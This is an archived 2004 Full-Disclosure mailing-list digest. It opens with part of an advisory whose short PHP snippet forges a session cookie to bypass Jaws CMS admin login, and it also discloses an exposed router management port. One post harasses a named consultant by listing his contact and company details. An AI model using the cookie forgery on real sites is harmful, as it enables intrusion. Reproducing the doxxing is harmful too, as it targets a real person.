The $_SESSION["logged"] variable before entering the Control Panel it has
a Null ("") value.

a possible way to exploit it should be:

//BEGIN

//exploit.php
<?PHP
setcookie("logged","d41d8cd98f00b204e9800998ecf8427e",time()+86400*365,'path
to jaws');
?>

//END

Where "d41d8cd98f00b204e9800998ecf8427e" is the MD5 hash for the NULL value

This way we can create a cookie ( that look like from the remote system)
and then try the Url:

http://127.0.0.1/jaws/admin.php

and we will be inside.

III. Solution
     šššššššš
    The main coder was contacted and the code was fixed in the cvs ;).

IV. Greetings

    - Greets to GIGAX people.
    - Greets All the community. I learn of you!

V. Contact

    Fernando Quintero
    nandogigax.org
    Medellín-Colombia

VI. Final words

    - Sorry by the english and !!! Viva Colombia !!!!!!!!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Successful in blocking all known exploits

From: stephane nasdrovisky (stephane.nasdroviskyparadigmo.com)
Date: Tue Jul 06 2004 - 03:01:06 CDT

Maarten wrote:

>On Saturday 03 July 2004 18:25, J.A. Terranson wrote:
>
>
>>On Sat, 3 Jul 2004, RandallM wrote:
>>
>>
>>>After a number of years, much thought,and long nights I have developed a
>>>systematic method to prevent and thwart exploits on my system!
>>>
>>>NEVER REBOOT!
>>>
>>>up and running for 876 days straight and have had no problems
>>>
>>>
>>>
>>Yeah, but what about Windowz boxes?
>>
>>
I've seen one (pdc) alive for +- 2 years. The administrator didn't
believe me when I sayd the latest issue (a stupid thing I don't remember
such as no authentication possible anymore) he was facing would
-probably- be solved by a reboot (My limited nt eperience is: reboot
twice (at least) watch the screen with 3-4 colleagues (at least) if the
issue is not solved by these 2 magic keys, spend some time but do not
spend too much time trying to understand what's happening::it's usually
a waste of time).

>Hum, how did you guess he isn't talking about a windows box ? 8-))
>
>
Did he meant neve reboot or never boot. In the 2nd case,I guess most of
you will agree. The same kind of things applys for infratructures: isn't
air gap firewalls one of te most secure piece of hardware?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] ANOTHER 3L33T3 ADVISO AND NOT ON PHP-CASTOR 10.3 BETA

From: harry (Rik.Bobbaerscc.kuleuven.ac.be)
Date: Tue Jul 06 2004 - 03:04:18 CDT

Rudolf Polzer wrote:

> I didn't expect that you will actually write that since today is
> nowhere April 1th.
>
> If you now find a DoS in a Brainf*** interpreter by coding an endless
> loop in Brainf*** you are the first one on my gmail killfile - until
> Mar 31th, 2005. Finding the code for an endless loop in Brainf*** will
> be your own problem.

now it's time to quote you, rudolf... on his (frogman) last
"vulnerability disclosure" with php's include() function, you wrote:

<quote from divzeroATgmailDOTcom on 07/03/2004 06:19 PM>
So your next advisory will be about a BIGBUG in system() - when badly
used, an attacker can execute arbitrary code on your webserver?
</quote>

as you can see... this froggyman is just a kiddie asking for some
attention. interesting for other kiddies and beginners, but absolutely
useless for this list (imho)

--
harry
aka Rik Bobbaers

K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50
Rik.Bobbaerscc.kuleuven.ac.be -=- http://harry.ulyssis.org

"\x41\x20\x63\x6f\x6d\x70\x75\x74\x65\x72\x20\x77\x69\x74\x68\x6f\x75\x74\x20"
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x69\x73\x20\x6c\x69\x6b\x65\x20\x61\x20\x66"
"\x69\x73\x68\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x61\x20\x62\x69\x63\x79\x63"
"\x6c\x65\x0a\x00"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] ANOTHER 3L33T3 ADVISO AND NOT ON PHP-CASTOR 10.3 BETA (used by 3peoples on internet) !!! 0DAY EXPLOIT !

From: Othman Nasrou (sleemaltaserv.homeip.net)
Date: Mon Jul 05 2004 - 19:03:21 CDT

> IHC TEAM private work, all the fame become to IHC TEAM and the leetest mr.
> Frog-mn !!!!

 Well, I am from the IHC Team. Those people that wrote down stupid things
like that are just trying to discredit us. I think everyone here knows
that kind of "black hat" that are just trying to look rebels with their
"no disclosure".
 It's not the first time that IHC Team and Frog-Man (webmaster of
phpsecure.info) have been attacked by these guys... It seems that they
won't grow up. What a pity!
  I'm really afraid I didn't mean to answer the first mail about us, I
guess that this mailing list is not made for things like that, but I
had to say to everyone that we're not concerned by these posts...
They're just trying to make fun... How funny it is...

 Sorry,
Best Regards,
Othman Nasrou aka Sleem,
http://www.ihcteam.org/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Boggles Delayed Advisories presents: so1o

From: Boggles (boggleshush.com)
Date: Tue Jul 06 2004 - 03:06:11 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -
Boggles Special:
- --
Boggles has Hangover this morning.

Boggles would like to apologise to world for not Oreilly-ing advisories
earlier.

Boggles has managed to focus half a retina to decode Boggles' Inbox.

Boggles appreciate the fan mail. But if Boggles Fans not careful Boggles
have to sell Full-Disclosure email's to iDefense to pay for more mailbox.

(With the exception of System Outage email, even iDefense would think
uber Boggles was taking the Spitzner)

P.S Boggle's luv u all (mostly).

So, without further a do or don't:

Boggle's Delayed Reaction Advisorys are proud to present:

A Boggles Special:
*********************************************
  !SPECIAL BOGGLES SPECIAL BOGGLES SPECIAL!
*********************************************

<so1o> got my first book copy from oreilly today
  ++ Boggles knew he should have done something about that.
  ++ Boggles is sorry for failing the community and letting so1o
  ++ publish.

  ++ Boggles Hopes he can make up for this by asking the English
  ++ Government
  ++ why so1o's company was in liquidation, hadn't filled in a tax
  ++ return, but was still trading. (companieshouse.gov.uk)

<so1o> i hate report writing
  ++ Boggles think he mention this already.

  ++ Boggles doesn't like so1o
  ++ (Boggles jealous, Boggles want Beastiality Book cover.)

  ++ So Boggles is going to include more so1o information.
  Name: Chris McNab
  Company: Matta Consulting Limited
  Email: chris.mcnabtrustmatta.com
  Company website: trustmatta.com
  Domain registrant: (Boggles good with `whois`!!)
  Matta Security
  18 Duncan Terrace
  London London
  N1 8BZ
  UK
  nickbasketthotmail.com

  ++ Boggles visit London.
  (I didn't meet the queen tho,
  On that topic, who seen Spitzner lately?)

  Name & Registered Office :
  MATTA CONSULTING LIMITED
  314 5102
  ST JAMES BARTON
  BRISTOL
  AVON BS1 3LY
  Status :Active(ly wh0ring). [Boggles didn't at that, honest.]
  Company No. :03629907
  Date of Incorporation : 11/09/1998

  Country of Origin : United Kingdom

  Company Type: Private Limited Company
  Nature Of Business (SIC(92)):
  7487 - other business activities [wh0ring]

  Accounting Reference Date : 30/09
  Last Accounts Made Up To : 30/09/2002 (TOTAL EXEMPTION FULL)
  Next Accounts Due : 30/07/2004 [ohh, Boggles enjoy 'dem!]
  Last Return Made Up To : 11/09/2003
  Next Return Due : 09/10/2004

  Last Members List : 11/09/2003 [#phrack]

  Previous Names [Christina]
  Date of Change : Previous Name :
  25/04/2003 NETWORK SECURITY SOLUTIONS LTD.

  Branch Details
  There are no branches associated with this company.
  [If statements would be too ub3r]

  Oversea Company Information
  There are no Oversea Details associated with this company.
  [Oh, dat's a fib]

  Boggles suggest groups.google.com for nickbasketthotmail.com (it
  funny).

  using his signature:
  "many thanks, Nick Baskett" is funnier. play "follow the work trail"

  Boggles enjoy that game.

  Chris says he works with the British "High Tech Crime Unit"
  (yes the ones who took months to bring the site live because they
  were.."concerned about security")

  Boggles spoke to LOTS of people.

  Boggles think's Chris tell weeny fibblet

  Chris should pay ALL money that he has made
  (potentially illegally if he hasn't done his paperwork)
  to the Amazon rainforest. He has wasted so many _FSCKING_
  trees copying and pasting from the internet.

  Boggles is sorry to the kids for using nasty word like "amazon".
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkDqXXUACgkQ2IK15vxw2kMfPQCfTcqZ+sbiEOPQe0BldNaZp/ABA50A
oIuyRzp3TkDor/VEjSSTT1zbrgTA
=/BWP
-----END PGP SIGNATURE-----

Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about-affiliate?l=427

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] RE: Public Review of OIS Security Vulnerability Reporting and ResponseGuidelines

From: Thomas48 (thomas48singnet.com.sg)
Date: Tue Jul 06 2004 - 05:39:48 CDT

Dear all

Finally there's going to be a true blue security conference in Singapore
that is product and vendor neutral.

The Symposium on Security for Asia Network (SyScAN "04) would be held on
16th - 17th December 2004 in Singapore. SyScan "04 would be held at the
beautiful Swissotel Merchant Court Hotel, which is located a stone throw
away from the financial and the pub districts, and 10 minutes away from the
famous shopping belt of Orchard Road.

SyScAN "04 boasts a list of expert speakers in their various fields, coming
from US and Europe and the topics would be scintillating and mesmerising.

SyScAN "04 would be a wonderful avenue for all security enthusiasts from all
over the world, especially those from Asia, to gather and fraternise.

Please do visit www.syscan.org for more information and register.

Thanks!

*********************************************
Organising Committee
SyScAN "04

Confidentiality Notice: This e-mail transmission may contain confidential or
legally privileged information that is intended only for the individual or
entity named in the e-mail address. If you receive this e-mail in error,
please delete this message immediately. Further, you should not re-transmit,
copy, store, or reveal the contents of this message to any third party.

-----Original Message-----
From: fredmobach.nl [mailto:fredmobach.nl]
Sent: Monday, July 05, 2004 2:57 AM
To: bugtraqsecurityfocus.com
Cc: OIS; NTBUGTRAQLISTSERV.NTBUGTRAQ.COM;
full-disclosurelists.netsys.com
Subject: Re: Public Review of OIS Security Vulnerability Reporting and
ResponseGuidelines

OIS wrote:
>
> The Organization for Internet Safety (OIS) extends an invitation to
> the readers of the BugTraq, NTBugtraq, and Full-Disclosure mailing
> lists to participate in the ongoing public review of the OIS Security
> Vulnerability Reporting and Response Guidelines.

I have problems with the OIS guidelines as I distrust at least one
member of OIS since it won't publish verifiable information on Bugtraq
since some years. When I combine the policy of that company with the
next statement from OIS's about.html page

"Does OIS support pre-disclosure of vulnerability information to select
groups?
No. We believe the software author should be given a chance to create a
fix before vulnerability information is made public, but that there
should be no further distribution of that information until the fix is
complete. This priniciple can be very difficult to adhere to in certain
situations, such as dealing with the open source community where there
aren't protections to keep vulnerability information secret."

I am afraid that that company might take years to supply a fix or even
to never supply that. A limit of at most four weeks before disclosure
seems reasonable to me. If that company cannot live with that it can opt
to die.

Another interesting point for me is the statement about the open source
community in the same paragraph. Some organizations still have problems
with that community, which is reflected by adopters.html webpage of OIS.
No representation of the open source community as far as I can see. But
please correct me if I am wrong.
--
Fred Mobach - fredmobach.nl - postmastermobach.nl
Systemhouse Mobach bv - The Netherlands - since 1976
website : http://fred.mobach.nl
Q: servos ad pileum vocare ?
A: servos fenestrae ad pileum rubrem vocare !
---
Incoming mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.708 / Virus Database: 464 - Release Date: 6/18/2004

---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.708 / Virus Database: 464 - Release Date: 6/18/2004

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Beta Advisories

From: System Outage (system_outageyahoo.com)
Date: Tue Jul 06 2004 - 05:56:18 CDT

If you do a query on the BUGTRAQ archive you'll see no mention of Gmail and i'm sure that's not because people haven't been atttempting to post about Gmail , but because the moderators think Gmail is beta. I bet once Gmail is launched as a public service, the BUGTRAQ moderators will allow Gmail advisories.
 
 
Cheerio
 

                
---------------------------------
Do you Yahoo!?
New and Improved Yahoo! Mail - 100MB free storage!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: [ISN] E-Mail Snooping Ruled Permissible

From: Jason Coombs (jasoncscience.org)
Date: Tue Jul 06 2004 - 07:37:38 CDT

Anyone who has not read this appeals court decision should do so now.

http://www.ca1.uscourts.gov/pdf.opinions/03-1383-01A.pdf

The stipulated facts make it clear that the government failed to hire an
expert witness who knows how SMTP, POP3, sendmail, procmail, DNS, MTA,
MUA, HTTP, Web browsers, computers, hard drives, software, RAM and the
Internet actually work.

Take, for instance, page 3, where both parties stipulate that the
following is true:

"Once the e-mail is accessible to the recipient, final delivery has been
completed."

Every person who is reading this message should be able to stipulate
that final delivery was not complete until a Mail User Agent retrieved
it from temporary storage on the mail server. If you're using Webmail
then your browser is your MUA and it speaks HTTP rather than POP3. That
was the case with Interloc e-mail accounts.

Yet the court and the parties managed to agree that final delivery is
complete any time the message is in the possession of an MTA that
happens to consider itself to be the last hop in the delivery route.
Never mind that there must be one more delivery step where an MUA under
user control receives the message on behalf of the user.

The fact that the mail server may arbitrarily expire old messages and
take other actions that disrupt the final delivery to an MUA was clearly
of no concern to anyone in this case.

I can't imagine ever stipulating that once my mail messages are touched
by procmail final delivery is complete. That's like saying once the
incoming mail truck arrives at my local post office and the mail sort is
done and my mail is placed in a stack with a rubber band around it that
final delivery is complete. All I have to do now is go to the post
office and remind them that they didn't bother to deliver my mail today
and I'll be given access to the stack, right? Therefore final delivery
is complete once the stack is created that has my name on it?

Nobody cares about getting the message delivered to a program that is
under the control of the recipient, apparently.

The only storage location that can be considered to be final delivery of
an e-mail message is a storage location that is under the control of the
recipient. An inbox on the recipient's hard drive would be a fine
indication of final delivery. To even approach a proper stipulation of
facts with respect to the subtle distinction between Web-based e-mail
services, which are closer to post office boxes, and POP3-based e-mail
services, which are closer to conventional postal mail delivery to your
home, requires mention of POP3 and the role of the MUA, both of which
are missing from the stipulation made by the parties.

The dissenting opinion, page 18, includes discussion of MUA but it
asserts that the MUA in this case was procmail. One would hope that the
voice of reason would at least get its facts straight when everyone else
was lost or confused. Too bad in this case the voice of reason was
clueless, too.

The court correctly points out that Congress intentionally exempted
stored electronic communication from the definition of "electronic
communication" in section 2510(12) of 18 U.S.C. There is no other reason
than this intentional exemption that the appeals court ruled as they did
in this case, and given the facts as they were presented by the parties
the ruling was proper.

However, an e-mail message goes from electronic storage on a hard drive
to electronic storage in RAM and then back to electronic storage on a
hard drive again by passing through wires. The government should have
argued that the procmail program intercepted electronic communications
by causing stored electronic communications to once again be transmitted
over wires. But for stimulating that transmission over wires the
procmail system would not have been able to access the second set of
stored electronic communications THAT THE PROCMAIL PROGRAM ITSELF
CAUSED. In reality the procmail program was creating an echo and
capturing the echo. That you cannot do this in other wiretap scenarios
and thereby avoid the Wiretap Act should have made the court examine
this more closely.

This case should have set the precedent that causing a stored electronic
communication to be transmitted over wires to a different electronic
communication storage temporarily "on-demand" in order to circumvent the
Wiretap Act is not acceptable. The exemption on stored electronic
communications that came from Steve Jackson Games v. U.S. Secret Service
should not be applied to "live" electronic communications systems that
can be induced to "echo" stored electronic communications but rather the
Steve Jackson Games precedent should apply only to "dead" storage that
must be reactivated, powered up from an off condition and examined
directly, without causing an echo, in order for the stored electronic
communications to be accessed.

Steve Jackson Games should continue to exempt forensic investigators
from prosecution or civil liability, and keep true "stored electronic
communications" accessible to law enforcement and the prosecution in
criminal cases. It is necessary for there to be some exemption otherwise
it would be impossible for law enforcement to ever look at any hard
drive without obtaining a wiretap authorization that specifically names
every party whose stored communications are found on the drive when it
is analyzed. However, the exemption that this court ruling suggests we
must learn to live with is not an exemption that is sensible or that is
consistent with the full truth of the matter.

The court in this case was not given the opportunity to consider this
view because the technical stipulations of fact were so badly flawed. I
would be satisfied with the outcome of this appeal had the technical
stipulations and reasoning been proper, yet they were not. We still do
not know how a court might rule if the correct and true technical
stipulation is made in a similar case. We do know that it will be more
difficult to get another appeal heard on the matter, as other courts
will tend to defer to this appeal unless somebody intelligent manages to
explain these issues clearly at just the right time.

It is disturbing to see how poor the quality of computer expert
testimony is in court, and how little effort is put into clarifying the
reality behind technical issues. When the parties stipulate to things
that are not the truth, or when either side is technically inept, it
causes courts to make errors. Then we end up with bad precedent.

Sincerely,

Jason Coombs
jasoncscience.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] backdoor menu on conexant chipset dsl router (Zoom X3)

From: Adam Laurie (adamalgroup.co.uk)
Date: Tue Jul 06 2004 - 07:37:44 CDT

i have just installed an adsl modem sold under the brand of Zoom X3

   http://www.zoom.com/products/adsl_overview.html

and was apalled to find that an nmap scan of the external address
immediately came up with the following:

   PORT STATE SERVICE
   23/tcp open telnet
   80/tcp open http
   254/tcp open unknown
   255/tcp open unknown

ports 23 and 80 give access to the configuration menu and html interface
as would be expected, but, although you can control access to the html
interface, there is no control over the telnet port other than password.

worse still, telnetting to port 254 gives you access to another menu,
which identifies itself as "ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A)
3.27", and uses the *DEFAULT* HTML management password, even if you have
changed it to something else. i.e. changing the HTML password does not
change this one. from this menu you can change DSL settings and issue a
complete "Factory Reset". there is a menu option to change the password,
but this does not appear to work.

port 255 accepts connections, but I have not investigated further.

at the minimum this carries a risk of a trivial DOS attack (factory
reset and everthing stops working), and may actually have other more
serious implications.

i am disgusted that in this day and age products like this are still
being shipped with such basic insecurities, and, accordingly, will not
be wasting my time by looking into it any further, and will be taking
the router back and exchanging it for something (hopefully) better
thought out.

to their credit, Zoom responded immediately with a workaround when i
reported the problem, so they are clearly already aware. fyi, the
workaround is to create dummy "Virtual Servers" on each of the ports
that blackhole any incoming connections. this appears to work.

connexant list several other high profile retail modem manufacturers and
pc oems, so i leave it as an exercise for the reader to work out other
manufacturer/vulnerability combinations.

   http://www.conexant.com/support/md_supportlinks.html

enjoy,
Adam
--
Adam Laurie Tel: +44 (20) 8742 0755
A.L. Digital Ltd. Fax: +44 (20) 8742 5995
The Stores http://www.thebunker.net
2 Bath Road http://www.aldigital.co.uk
London W4 1LT mailto:adamalgroup.co.uk
UNITED KINGDOM PGP key on keyservers

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Web sites compromised by IIS attack

From: Barry Fitzgerald (bkfsecsdf.lonestar.org)
Date: Tue Jul 06 2004 - 08:33:51 CDT

Maarten wrote:

>On Friday 02 July 2004 23:33, Barry Fitzgerald wrote:
>
>
>>
>>No, I'm not wrong.
>>
>>The discussion is about who's responsible for support of said software.
>>There's no obligation through the GNU GPL that support is required if
>>money changes hands, however the point of the discussion is who's
>>responsible for support of said software in a situation where the
>>software produced is broken and supported.
>>
>>Red Hat sells support. The act of taking binaries and actively and
>>intentionally redistributing them is a support service.
>>
>>
>
>Well that is open to debate. If I just download Redhat, they make no money
>off me. Do they still have to fix my software then ? Are they responsible ?
>
>

Nope - it's the act of exchanging money for the support contract that
makes the obligated to provide said support.

             -Barry

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Beta Advisories

From: Henrik Persson (nixsyndicalist.net)
Date: Tue Jul 06 2004 - 08:47:32 CDT

On Tue, 2004-07-06 at 12:56, System Outage wrote:
> If you do a query on the BUGTRAQ archive you'll see no mention of
> Gmail and i'm sure that's not because people haven't been atttempting
> to post about Gmail , but because the moderators think Gmail is beta.
> I bet once Gmail is launched as a public service, the BUGTRAQ
> moderators will allow Gmail advisories.

Pherhaps. But this _is_ full-disclosure, not bugtraq. This is FULL
disclosure.

I'm lazy, too lazy to just filter you out. Stop posting garbage,
garbage! ;/

--
Henrik Persson <nixsyndicalist.net>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Bugs, worms and IPO originate from silicon, rather than bad software.

From: Feher Tamas (etomcatfreemail.hu)
Date: Tue Jul 06 2004 - 09:09:52 CDT

Bugs, worms and IPO originate from silicon, rather than bad software:

http://molecularexpressions.com/creatures/pages/roach.html
http://molecularexpressions.com/creatures/pages/canoworms.html
http://molecularexpressions.com/creatures/pages/disclaimer.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] IE Web Browser: "Sitting Duck"

From: Barry Fitzgerald (bkfsecsdf.lonestar.org)
Date: Tue Jul 06 2004 - 09:27:40 CDT

joe wrote:

>Couple of things.
>
>1. The conversation you are referring to was a conversation about issues
>with core base components that necessitated a complete redesign. You kept
>bringing up items that were NOT core base components - they were UI
>components. IE being one of them. The very fact that you have a choice to
>use a different browser should help you understand that. Try to use a
>different ACL system on Windows NT based systems and tell me how that goes.
>
>
>
The choice to use a different browser doesn't imply that IE isn't a core
base component at all.

Is it a part of the kernel? No...

Is it completely unremovable? Of course not...

Is it a part of the standard Windows UI? Yes...

Is it impossible to remove easily and difficult to remove cleanly? Yes...

Will removing it make many programs operate incorrectly? Yes...

I think you see where I'm going with this. It's a core component in MS
Windows, though it may not be a part of the OS kernel, it is,
nonetheless, undebatably, a core component of MS Windows as a software.
Keep in mind, IE is more than just a simple executable. The DLLs that
it uses are built to be used by other portions of the system and are
extensively used. Of course, this is the nature of DLLs.

                               -Barry

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [OpenPKG-SA-2004.030] OpenPKG Security Advisory (png)

From: OpenPKG (openpkgopenpkg.org)
Date: Tue Jul 06 2004 - 09:12:42 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

________________________________________________________________________

OpenPKG Security Advisory The OpenPKG Project
http://www.openpkg.org/security.html http://www.openpkg.org
openpkg-securityopenpkg.org openpkgopenpkg.org
OpenPKG-SA-2004.030 06-Jul-2004
________________________________________________________________________

Package: png
Vulnerability: buffer overflow vulnerability
OpenPKG Specific: no

Affected Releases: Affected Packages: Corrected Packages:
OpenPKG CURRENT <= png-1.2.5-20040527 >= png-1.2.5-20040629
                     <= doxygen-1.3.7-20040507 >= doxygen-1.3.7-20040630
                     <= ghostscript-8.14-20040604 >= ghostscript-8.14-20040630
                     <= kde-qt-3.2.3-20040429 >= kde-qt-3.2.3-20040702
                     <= pdflib-5.0.3-20040625 >= pdflib-5.0.3-20040701
                     <= perl-tk-5.8.4-20040622 >= perl-tk-5.8.4-20040701
                     <= qt-3.3.2-20040615 >= qt-3.3.2-20040702
                     <= rrdtool-1.0.48-20040513 >= rrdtool-1.0.48-20040702
                     <= tetex-2.0.2-20040429 >= tetex-2.0.2-20040702
                     <= wx-2.4.2-20040425 >= wx-2.4.2-20040702

OpenPKG 2.0 <= png-1.2.5-2.0.1 >= png-1.2.5-2.0.2
                     <= doxygen-1.3.6-2.0.1 >= doxygen-1.3.6-2.0.2
                     <= ghostscript-8.13-2.0.1 >= ghostscript-8.13-2.0.2
                     <= pdflib-5.0.3-2.0.1 >= pdflib-5.0.3-2.0.2
                     <= perl-tk-5.8.3-2.0.1 >= perl-tk-5.8.3-2.0.2
                     <= qt-3.2.3-2.0.1 >= qt-3.2.3-2.0.2
                     <= rrdtool-1.0.46-2.0.1 >= rrdtool-1.0.46-2.0.2
                     <= tetex-2.0.2-2.0.1 >= tetex-2.0.2-2.0.2

OpenPKG 1.3 <= png-1.2.5-1.3.1 >= png-1.2.5-1.3.2
                     <= doxygen-1.3.3-1.3.1 >= doxygen-1.3.3-1.3.2
                     <= ghostscript-8.10-1.3.1 >= ghostscript-8.10-1.3.2
                     <= pdflib-5.0.1-1.3.1 >= pdflib-5.0.1-1.3.2
                     <= perl-tk-1.3.0-1.3.1 >= perl-tk-1.3.0-1.3.2
                     <= rrdtool-1.0.45-1.3.1 >= rrdtool-1.0.45-1.3.2
                     <= tetex-2.0.2-1.3.1 >= tetex-2.0.2-1.3.2

Affected Releases: Dependent Packages:
OpenPKG CURRENT apache autotrace blender cups emacs gd gdk-pixbuf
                     gif2png gimp gnuplot gqview graphviz gtk2
                     imagemagick imlib latex2html lbreakout libwmf
                     mplayer mrtg nagios netpbm perl-gd php php3 php5
                     povray pstoedit scribus transfig webalizer wml wv
                     xemacs xfig xine-ui xplanet xv zimg

OpenPKG 2.0 apache autotrace emacs gd gdk-pixbuf ghostscript
                     gif2png gimp gnuplot graphviz gtk2 imagemagick
                     imlib latex2html libwmf mozilla netpbm perl-gd
                     perl-tk php png pstoedit qt transfig webalizer wml
                     xfig xv

OpenPKG 1.3 apache autotrace emacs gd gdk-pixbuf gif2png gimp
                     gnuplot graphviz gtk2 imagemagick imlib latex2html
                     libwmf netpbm perl-gd php pstoedit webalizer wml xv

Description:
  In a previous OpenPKG security advisory [0], a buffer overflow
  vulnerability was addressed in the Portable Network Graphics (PNG)
  library libpng [1] in connection with 16-bit samples. The starting
  offsets for the loops are calculated incorrectly which may cause
  a buffer overrun beyond the beginning of the row buffer. The
  Common Vulnerabilities and Exposures (CVE) project assigned the id
  CAN-2002-1363 [2] to the problem. During an audit of Red Hat Linux
  updates, the Fedora Legacy team found another occurrence of this
  buffer overflow related to grayscale images. This OpenPKG update
  addresses the additional problem.

  Please check whether you are affected by running "<prefix>/bin/rpm
  -q png" (and similarly for the other affected packages which have
  PNG included). If you have the "png" package (or one of the others)
  installed and its version is affected (see above), we recommend that
  you immediately upgrade it (see Solution) and its dependent packages
  (see above), if any, too [3][4].

Solution:
  Select the updated source RPM appropriate for your OpenPKG release
  [5][6], fetch it from the OpenPKG FTP service [7][8] or a mirror
  location, verify its integrity [9], build a corresponding binary RPM
  from it [3] and update your OpenPKG installation by applying the
  binary RPM [4]. For the most recent release OpenPKG 2.0, perform the
  following operations to permanently fix the security problem (for
  other releases adjust accordingly).

  $ ftp ftp.openpkg.org
  ftp> bin
  ftp> cd release/2.0/UPD
  ftp> get png-1.2.5-2.0.2.src.rpm
  ftp> bye
  $ <prefix>/bin/openpkg rpm -v --checksig png-1.2.5-2.0.2.src.rpm
  $ <prefix>/bin/openpkg rpm --rebuild png-1.2.5-2.0.2.src.rpm
  $ su -
  # <prefix>/bin/openpkg rpm -Fvh <prefix>/RPM/PKG/png-1.2.5-2.0.2.*.rpm

  Additionally, we recommend that you rebuild and reinstall
  all dependent packages (see above), if any, too [3][4].
________________________________________________________________________

References:
  [0] http://www.openpkg.org/security/OpenPKG-SA-2003.001-png.html
  [1] http://www.libpng.org/pub/png/
  [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1363
  [3] http://www.openpkg.org/tutorial.html#regular-source
  [4] http://www.openpkg.org/tutorial.html#regular-binary
  [5] ftp://ftp.openpkg.org/release/1.3/UPD/png-1.2.5-1.3.2.src.rpm
  [6] ftp://ftp.openpkg.org/release/2.0/UPD/png-1.2.5-2.0.2.src.rpm
  [7] ftp://ftp.openpkg.org/release/1.3/UPD/
  [8] ftp://ftp.openpkg.org/release/2.0/UPD/
  [9] http://www.openpkg.org/security.html#signature
________________________________________________________________________

For security reasons, this advisory was digitally signed with the
OpenPGP public key "OpenPKG <openpkgopenpkg.org>" (ID 63C4CB9F) of the
OpenPKG project which you can retrieve from http://pgp.openpkg.org and
hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/
for details on how to verify the integrity of this advisory.
________________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Comment: OpenPKG <openpkgopenpkg.org>

iD8DBQFA6rMXgHWT4GPEy58RAhg6AJ0e+JlFr6f+DeQ4O6jqWcwK/J2o4gCcDftH
FtWb78lAsCODyiZ/A3tXS8E=
=wWJs
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Web sites compromised by IIS attack

From: Willem Koenings (iseceurope.com)
Date: Tue Jul 06 2004 - 10:10:30 CDT

hi,

> It also is not a list for the benefit exclusively of people who are
> fortunate enough to have simple security problems. The security issues
> surrounding the question "how do I keep my home computer safe from
> attack?" are trivial compared to those surrounding the question "how do
> I keep the 200,000 computing devices worldwide within my organization
> from being owned and then attacking each other?"

> Anyone with a truly complex security problem knows that it is hopeless
> to ever really control many computers in the presence of many people.
> You have no choice in a complex situation but to let things happen that
> you think are beneficial to you (the vendor installing patches, in this
> discussion) and find a way, after the fact, or periodically, to confirm
> that the end result was in fact beneficial to you.

Jason, i have to disagree with you. Security is not a technology,
security is a way of thinking (regards goes here to Schneier). And
when you start thinking in right way, then there is no difference
whatsoever whether the subject is home computer or large production
installation.

And i have seen, in reality, uncounted time, in respected companies,
that after vendor specialist comes and installs updates/patches, system is
screwed. Yes, you have contracts, but company's image and face in
front of customers is everything. So at least here, in security list,
it is wrong to propagate the way that just sit and wait and let the
vendor came and fix all.

willem

- even the best hackers will tell you that the game is a mental one.
--
___________________________________________________________
Sign-up for Ads Free at Mail.com
http://promo.mail.com/adsfreejump.htm

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Beta Advisories

From: System Outage (system_outageyahoo.com)
Date: Tue Jul 06 2004 - 10:47:47 CDT

I don't think it's garbage. I bring up a valid point here. If you must, filter me out.. don't be lazy.
 
This brings up the question of guidelines the OIS wish people to follow.
 
 
Cheerio

Henrik Persson <nixsyndicalist.net> wrote:
On Tue, 2004-07-06 at 12:56, System Outage wrote:
> If you do a query on the BUGTRAQ archive you'll see no mention of
> Gmail and i'm sure that's not because people haven't been atttempting
> to post about Gmail , but because the moderators think Gmail is beta.
> I bet once Gmail is launched as a public service, the BUGTRAQ
> moderators will allow Gmail advisories.

Pherhaps. But this _is_ full-disclosure, not bugtraq. This is FULL
disclosure.

